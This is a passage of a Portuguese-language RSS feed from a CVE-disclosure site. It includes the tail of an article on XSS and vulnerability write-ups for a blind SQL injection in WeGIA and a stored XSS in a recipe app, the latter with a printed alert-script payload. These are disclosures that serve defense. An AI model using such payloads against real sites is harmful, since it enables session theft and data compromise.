&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Afinal, o XSS geralmente depende de um único clique e, nesse cenário, &amp;lt;b&amp;gt;o elo mais fraco geralmente é o próprio usuário&amp;lt;/b&amp;gt;. Não importa quão robusta seja sua estrutura ou quão bem configurada esteja sua WAF: se o invasor conseguir criar um link malicioso convincente, basta uma ação desatenta da vítima para que o ataque se concretize.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Enquanto nós confiamos em estruturas e WAFs, o invasor confia em nossa falta de cuidado e na curiosidade do usuário.&amp;lt;/b&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Apesar de muitas vezes ser classificado como uma vulnerabilidade de severidade &amp;lt;em&amp;gt;média&amp;lt;/em&amp;gt; ou até &amp;lt;em&amp;gt;baixa&amp;lt;/em&amp;gt;, o &amp;lt;strong&amp;gt;XSS não deve ser subestimado&amp;lt;/strong&amp;gt;. Seu impacto pode ser significativo, especialmente quando envolve o roubo de cookies, sequestro de sessão ou redirecionamento para páginas maliciosas. E o mais perigoso: &amp;lt;strong&amp;gt;nem sempre as proteções tradicionais são suficientes para impedir que o usuário seja enganado e clique naquele phishing que está utilizando uma URL legítima com vulnerabilidade de XSS.&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Afinal, o XSS frequentemente depende de um simples clique, e nesse cenário, &amp;lt;strong&amp;gt;o elo mais fraco costuma ser o próprio usuário&amp;lt;/strong&amp;gt;. Não importa o quão robusto seja seu framework ou quão bem configurado esteja seu WAF: se o atacante conseguir criar um link malicioso convincente, basta uma ação desatenta da vítima para que o ataque se concretize.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Enquanto confiamos em frameworks e WAFs, o atacante confia no nosso descuido,e na curiosidade do usuário.&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/xss-nao-esta-morto.png&amp;#34;
	width=&amp;#34;1200&amp;#34;
	height=&amp;#34;600&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/xss-nao-esta-morto_hu_5292005210033088.png 480w, /articles/xss-nao-esta-morto/xss-nao-esta-morto_hu_6838249933812897.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;480px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;escrito-por&amp;#34;&amp;gt;Escrito por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradora&amp;#34;&amp;gt;Colaboradora
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;parceria&amp;#34;&amp;gt;Parceria
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://hacktiba.github.io/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/partners/hacktiba60x60.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; Esse post foi feito em parceria com &amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://hacktiba.github.io/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Hacktiba&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt; para o Pulse 07.&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53091</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53091/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53091/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53091-vulnerabilidade-de-injeção-sql-baseada-em-tempo-não-autenticada-no-parâmetro-almox&amp;#34;&amp;gt;CVE-2025-53091: Vulnerabilidade de Injeção SQL baseada em tempo não autenticada no parâmetro &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção cega de SQL baseada em tempo foi descoberta no parâmetro &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/getProdutosPorAlmox.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end. Essa vulnerabilidade específica é cega por natureza e foi confirmada por meio de inferência baseada em tempo (função SLEEP()).&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53091-vulnerabilidade-de-injeção-sql-baseada-em-tempo-não-autenticada-no-parâmetro-almox&amp;#34;&amp;gt;CVE-2025-53091: Vulnerabilidade de Injeção SQL baseada em tempo não autenticada no parâmetro &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção cega de SQL baseada em tempo foi descoberta no parâmetro &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/getProdutosPorAlmox.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end. Essa vulnerabilidade específica é cega por natureza e foi confirmada por meio de inferência baseada em tempo (função SLEEP()).&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A solicitação vulnerável não requer nenhuma forma de autenticação (nenhum cookie, token ou cabeçalho é necessário), o que a torna especialmente crítica.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Abaixo estão duas solicitações HTTP de prova de conceito funcionais que demonstram a vulnerabilidade. A diferença no tempo de resposta confirma claramente a execução da função SLEEP() no backend:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53091/image.png&amp;#34;
	width=&amp;#34;1764&amp;#34;
	height=&amp;#34;856&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53091/image_hu_a59a17384516386a.png 480w, /p/cve-2025-53091/image_hu_9f758b97b421d6c3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;206&amp;#34;
		data-flex-basis=&amp;#34;494px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53091/image-1.png&amp;#34;
	width=&amp;#34;1773&amp;#34;
	height=&amp;#34;847&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53091/image-1_hu_862f1352375e1c2.png 480w, /p/cve-2025-53091/image-1_hu_47187b954f8b5b0c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;502px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 27 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6345</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6345/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6345/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6345-cross-site-scripting-xss-armazenado-no-endpoint-add-recipephp-parâmetro-recipe-name&amp;#34;&amp;gt;CVE-2025-6345: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; do aplicativo  My Food Recipe por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt; da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6345-cross-site-scripting-xss-armazenado-no-endpoint-add-recipephp-parâmetro-recipe-name&amp;#34;&amp;gt;CVE-2025-6345: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; do aplicativo  My Food Recipe por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt; da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/endpoint/add-recipe.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB My Food Recipe&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6345/image.png&amp;#34;
	width=&amp;#34;1885&amp;#34;
	height=&amp;#34;979&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6345/image_hu_2d96538d4258e3ef.png 480w, /p/cve-2025-6345/image_hu_69d65a36c5d34271.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6345/image-1.png&amp;#34;
	width=&amp;#34;1887&amp;#34;
	height=&amp;#34;978&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6345/image-1_hu_367086433527965a.png 480w, /p/cve-2025-6345/image-1_hu_97a43c355f94af1c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/HLt4Ezuzxaw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/HLt4Ezuzxaw&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6694</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6694/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6694/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6694-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_unidadephp-parâmetro-unidade&amp;#34;&amp;gt;CVE-2025-6694: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
